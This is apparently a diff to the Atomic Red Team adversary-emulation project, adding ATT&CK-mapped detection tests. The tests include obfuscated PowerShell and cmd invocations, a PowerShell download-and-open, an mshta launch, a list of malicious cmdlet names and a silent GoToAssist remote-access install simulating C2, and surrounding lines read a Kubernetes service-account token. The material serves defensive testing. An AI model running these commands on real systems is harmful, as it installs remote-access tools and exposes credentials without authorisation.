diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml index 7210e5af..4d5a5c58 100644 --- a/atomics/T1027/T1027.yaml +++ b/atomics/T1027/T1027.yaml @@ -150,3 +150,15 @@ atomic_tests: command: | Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} name: powershell + +- name: Obfuscated Command in PowerShell + auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f + description: | + This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + executor: + command: | + $cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f'nv','cO','ert') ; &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') ( (&("{1}{2}{0}"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) + name: powershell + diff --git a/atomics/T1053.007/T1053.007.yaml b/atomics/T1053.007/T1053.007.yaml index 30e260ab..81f4b5c5 100644 --- a/atomics/T1053.007/T1053.007.yaml +++ b/atomics/T1053.007/T1053.007.yaml @@ -6,8 +6,7 @@ atomic_tests: description: | Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to list @@ -25,8 +24,7 @@ atomic_tests: description: | Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to list @@ -40,4 +38,4 @@ atomic_tests: cleanup_command: | kubectl delete cronjob art -n #{namespace} name: bash - elevation_required: false \ No newline at end of file + elevation_required: false diff --git a/atomics/T1059.001/T1059.001.md b/atomics/T1059.001/T1059.001.md index d86d109d..f780b418 100644 --- a/atomics/T1059.001/T1059.001.md +++ b/atomics/T1059.001/T1059.001.md @@ -46,6 +46,10 @@ PowerShell commands/scripts can also be executed without directly invoking the < - [Atomic Test #18 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments](#atomic-test-18---athpowershellcommandlineparameter--encodedcommand-parameter-variations-with-encoded-arguments) +- [Atomic Test #19 - PowerShell Command Execution](#atomic-test-19---powershell-command-execution) + +- [Atomic Test #20 - PowerShell Invoke Known Malicious Cmdlets](#atomic-test-20---powershell-invoke-known-malicious-cmdlets) +
@@ -768,4 +772,74 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +
+
+ +## Atomic Test #19 - PowerShell Command Execution +Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** a538de64-1c74-46ed-aa60-b995ed302598 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| obfuscated_code | Defaults to: Invoke-Expression with a "Write-Host" line. | string | JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +powershell.exe -e #{obfuscated_code} +``` + + + + + + +
+
+ +## Atomic Test #20 - PowerShell Invoke Known Malicious Cmdlets +Powershell execution of known Malicious PowerShell Cmdlets + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 49eb9404-5e0f-4031-a179-b40f7be385e3 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| Malicious_cmdlets | Known Malicious Cmdlets | String | "Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord"| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +$malcmdlets = #{Malicious_cmdlets} +foreach ($cmdlets in $malcmdlets) { + "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"} +foreach ($cmdlets in $malcmdlets) { + $cmdlets} +``` + + + + + +
diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml index 23915cf6..15509f08 100644 --- a/atomics/T1059.001/T1059.001.yaml +++ b/atomics/T1059.001/T1059.001.yaml @@ -374,4 +374,41 @@ atomic_tests: Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop' - name: powershell \ No newline at end of file + name: powershell + +- name: PowerShell Command Execution + auto_generated_guid: a538de64-1c74-46ed-aa60-b995ed302598 + description: | + Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + obfuscated_code: + description: 'Defaults to: Invoke-Expression with a "Write-Host" line.' + type: string + default: JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA== + executor: + command: | + powershell.exe -e #{obfuscated_code} + name: command_prompt + +- name: PowerShell Invoke Known Malicious Cmdlets + auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3 + description: Powershell execution of known Malicious PowerShell Cmdlets + supported_platforms: + - windows + input_arguments: + Malicious_cmdlets: + description: Known Malicious Cmdlets + type: String + default: | + "Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord" + executor: + name: powershell + elevation_required: true + command: | + $malcmdlets = #{Malicious_cmdlets} + foreach ($cmdlets in $malcmdlets) { + "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"} + foreach ($cmdlets in $malcmdlets) { + $cmdlets} \ No newline at end of file diff --git a/atomics/T1059.003/T1059.003.md b/atomics/T1059.003/T1059.003.md index 4a96ddef..61786e57 100644 --- a/atomics/T1059.003/T1059.003.md +++ b/atomics/T1059.003/T1059.003.md @@ -12,6 +12,8 @@ Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execu - [Atomic Test #2 - Writes text to a file and displays it.](#atomic-test-2---writes-text-to-a-file-and-displays-it) +- [Atomic Test #3 - Suspicious Execution via Windows Command Shell](#atomic-test-3---suspicious-execution-via-windows-command-shell) +
@@ -101,4 +103,38 @@ del "#{file_contents_path}" +
+
+ +## Atomic Test #3 - Suspicious Execution via Windows Command Shell +Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** d0eb3597-a1b3-4d65-b33b-2cda8d397f20 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | File to output to | string | hello.txt| +| input_message | Message to write to file | string | Hello, from CMD!| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file} +``` + + + + + +
diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml index cbe28a3f..3c1952e2 100644 --- a/atomics/T1059.003/T1059.003.yaml +++ b/atomics/T1059.003/T1059.003.yaml @@ -52,3 +52,23 @@ atomic_tests: cleanup_command: | del "#{file_contents_path}" name: command_prompt + +- name: Suspicious Execution via Windows Command Shell + auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 + description: | + Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + output_file: + description: File to output to + type: string + default: hello.txt + input_message: + description: Message to write to file + type: string + default: Hello, from CMD! + executor: + command: | + %LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file} + name: command_prompt diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index caef3d08..57e0c326 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -32,6 +32,8 @@ - [Atomic Test #14 - whois file download](#atomic-test-14---whois-file-download) +- [Atomic Test #15 - File Download via PowerShell](#atomic-test-15---file-download-via-powershell) +
@@ -589,4 +591,38 @@ echo "Please install timeout and the whois package" +
+
+ +## Atomic Test #15 - File Download via PowerShell +Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| target_remote_file | File to download | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt| +| output_file | File to write to | string | LICENSE.txt| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file} +``` + + + + + +
diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index c90158a6..7838f6a5 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -381,3 +381,23 @@ atomic_tests: timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} cleanup_command: | rm -f #{output_file} + +- name: File Download via PowerShell + auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 + description: | + Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + target_remote_file: + description: File to download + type: string + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt + output_file: + description: File to write to + type: string + default: LICENSE.txt + executor: + command: | + (New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file} + name: powershell diff --git a/atomics/T1218.005/T1218.005.md b/atomics/T1218.005/T1218.005.md index 8682f1e1..fe099523 100644 --- a/atomics/T1218.005/T1218.005.md +++ b/atomics/T1218.005/T1218.005.md @@ -30,6 +30,8 @@ Mshta.exe can be used to bypass application control solutions that do not accoun - [Atomic Test #9 - Invoke HTML Application - Simulate Lateral Movement over UNC Path](#atomic-test-9---invoke-html-application---simulate-lateral-movement-over-unc-path) +- [Atomic Test #10 - Mshta used to Execute PowerShell](#atomic-test-10---mshta-used-to-execute-powershell) +
@@ -423,4 +425,38 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +
+
+ +## Atomic Test #10 - Mshta used to Execute PowerShell +Use Mshta to execute arbitrary PowerShell. Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 8707a805-2b76-4f32-b1c0-14e558205772 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| message | Encoded message to include | string | Hello,%20MSHTA!| +| seconds_to_sleep | How many seconds to sleep/wait | string | 5| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +mshta.exe "about:'" +``` + + + + + +
diff --git a/atomics/T1218.005/T1218.005.yaml b/atomics/T1218.005/T1218.005.yaml index 84790d0a..c6bb81eb 100644 --- a/atomics/T1218.005/T1218.005.yaml +++ b/atomics/T1218.005/T1218.005.yaml @@ -214,4 +214,24 @@ atomic_tests: Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force executor: command: 'Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path}' - name: powershell \ No newline at end of file + name: powershell + +- name: Mshta used to Execute PowerShell + auto_generated_guid: 8707a805-2b76-4f32-b1c0-14e558205772 + description: | + Use Mshta to execute arbitrary PowerShell. Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + message: + description: Encoded message to include + type: string + default: Hello,%20MSHTA! + seconds_to_sleep: + description: How many seconds to sleep/wait + type: string + default: 5 + executor: + command: | + mshta.exe "about:'" + name: command_prompt diff --git a/atomics/T1219/Bin/GoToCleanup.ps1 b/atomics/T1219/Bin/GoToCleanup.ps1 new file mode 100644 index 00000000..f4ae96de --- /dev/null +++ b/atomics/T1219/Bin/GoToCleanup.ps1 @@ -0,0 +1,14 @@ +# GoTo Opener - delete registry install key because it can't be called by the system +$InstalledApp = "GoTo Opener" +$Keys = Get-ChildItem -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall -ErrorAction SilentlyContinue +$Items = $Keys | Get-ItemProperty | where-object {$_.DisplayName -eq $InstalledApp} +If ($Items) { + $KeyToDelete = $Items.PSPath + Remove-Item $KeyToDelete -Recurse -Force -ErrorAction SilentlyContinue +} +# GoTo Opener - delete user directories +Get-ChildItem "C:\Users\*\AppData" "GoTo Opener" -Recurse -Force -ErrorAction SilentlyContinue | ForEach-Object { + $Directory = $_.ToString() + Remove-Item $Directory -Recurse -Force -ErrorAction SilentlyContinue + } +Start-Process -FilePath "C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_uninstaller_expert.exe" -ArgumentList "/uninstall /silent" -Wait -PassThru | Out-Null diff --git a/atomics/T1219/T1219.md b/atomics/T1219/T1219.md index 58c028d8..a80908e0 100644 --- a/atomics/T1219/T1219.md +++ b/atomics/T1219/T1219.md @@ -14,6 +14,8 @@ Admin tools such as TeamViewer have been used by several groups targeting instit - [Atomic Test #3 - LogMeIn Files Detected Test on Windows](#atomic-test-3---logmein-files-detected-test-on-windows) +- [Atomic Test #4 - GoToAssist Files Detected Test on Windows](#atomic-test-4---gotoassist-files-detected-test-on-windows) +
@@ -124,4 +126,38 @@ Remove-Item $file1 -ErrorAction Ignore +
+
+ +## Atomic Test #4 - GoToAssist Files Detected Test on Windows +An adversary may attempt to trick the user into downloading GoToAssist and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 1b72b3bd-72f8-4b63-a30b-84e91b9c3578 + + + + + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe "https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1" +$file1 = "C:\Users\" + $env:username + "\Downloads\GoToAssist.exe" +Start-Process $file1 /S; +``` + +#### Cleanup Commands: +```powershell +try{$PathToAtomicsFolder/T1219/Bin/GoToCleanup.ps1} catch{} +``` + + + + +
diff --git a/atomics/T1219/T1219.yaml b/atomics/T1219/T1219.yaml index 3231d454..701645f1 100644 --- a/atomics/T1219/T1219.yaml +++ b/atomics/T1219/T1219.yaml @@ -55,3 +55,18 @@ atomic_tests: name: powershell elevation_required: true +- name: GoToAssist Files Detected Test on Windows + auto_generated_guid: 1b72b3bd-72f8-4b63-a30b-84e91b9c3578 + description: | + An adversary may attempt to trick the user into downloading GoToAssist and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed. + supported_platforms: + - windows + executor: + command: | + Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe "https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1" + $file1 = "C:\Users\" + $env:username + "\Downloads\GoToAssist.exe" + Start-Process $file1 /S; + cleanup_command: + try{$PathToAtomicsFolder/T1219/Bin/GoToCleanup.ps1} catch{} + name: powershell + elevation_required: true \ No newline at end of file diff --git a/atomics/T1552.007/T1552.007.yaml b/atomics/T1552.007/T1552.007.yaml index c52c1078..34c4d88c 100644 --- a/atomics/T1552.007/T1552.007.yaml +++ b/atomics/T1552.007/T1552.007.yaml @@ -6,8 +6,7 @@ atomic_tests: description: | A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services. supported_platforms: - - macos - - linux + - containers input_arguments: namespace: description: K8s namespace to list @@ -22,7 +21,7 @@ atomic_tests: elevation_required: false - name: Cat the contents of a Kubernetes service account token file - auto_generated_guid: 788e0019-a483-45da-bcfe-96353d46820f + auto_generated_guid: 788e0019-a483-45da-bcfe-96353d46820f description: | Access the Kubernetes service account access token stored within a container in a cluster. @@ -76,4 +75,4 @@ atomic_tests: kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token name: sh cleanup_command: | - kubectl --context kind-atomic-cluster delete pod atomic-pod \ No newline at end of file + kubectl --context kind-atomic-cluster delete pod atomic-pod diff --git a/atomics/T1609/T1609.yaml b/atomics/T1609/T1609.yaml index 30303151..603506ab 100644 --- a/atomics/T1609/T1609.yaml +++ b/atomics/T1609/T1609.yaml @@ -6,8 +6,7 @@ atomic_tests: description: | Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“kubectl exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “kubectl exec”. supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to use @@ -26,4 +25,4 @@ atomic_tests: cleanup_command: | kubectl delete pod busybox -n #{namespace} name: bash - elevation_required: false \ No newline at end of file + elevation_required: false diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index bdecd84c..53d1ea44 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -732,3 +732,10 @@ c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 b8e747c3-bdf7-4d71-bce2-f1df2a057406 a12b5531-acab-4618-a470-0dafb294a87a d400090a-d8ca-4be0-982e-c70598a23de9 +54a4daf1-71df-4383-9ba7-f1a295d8b6d2 +d0eb3597-a1b3-4d65-b33b-2cda8d397f20 +a538de64-1c74-46ed-aa60-b995ed302598 +8b3f4ed6-077b-4bdd-891c-2d237f19410f +49eb9404-5e0f-4031-a179-b40f7be385e3 +1b72b3bd-72f8-4b63-a30b-84e91b9c3578 +8707a805-2b76-4f32-b1c0-14e558205772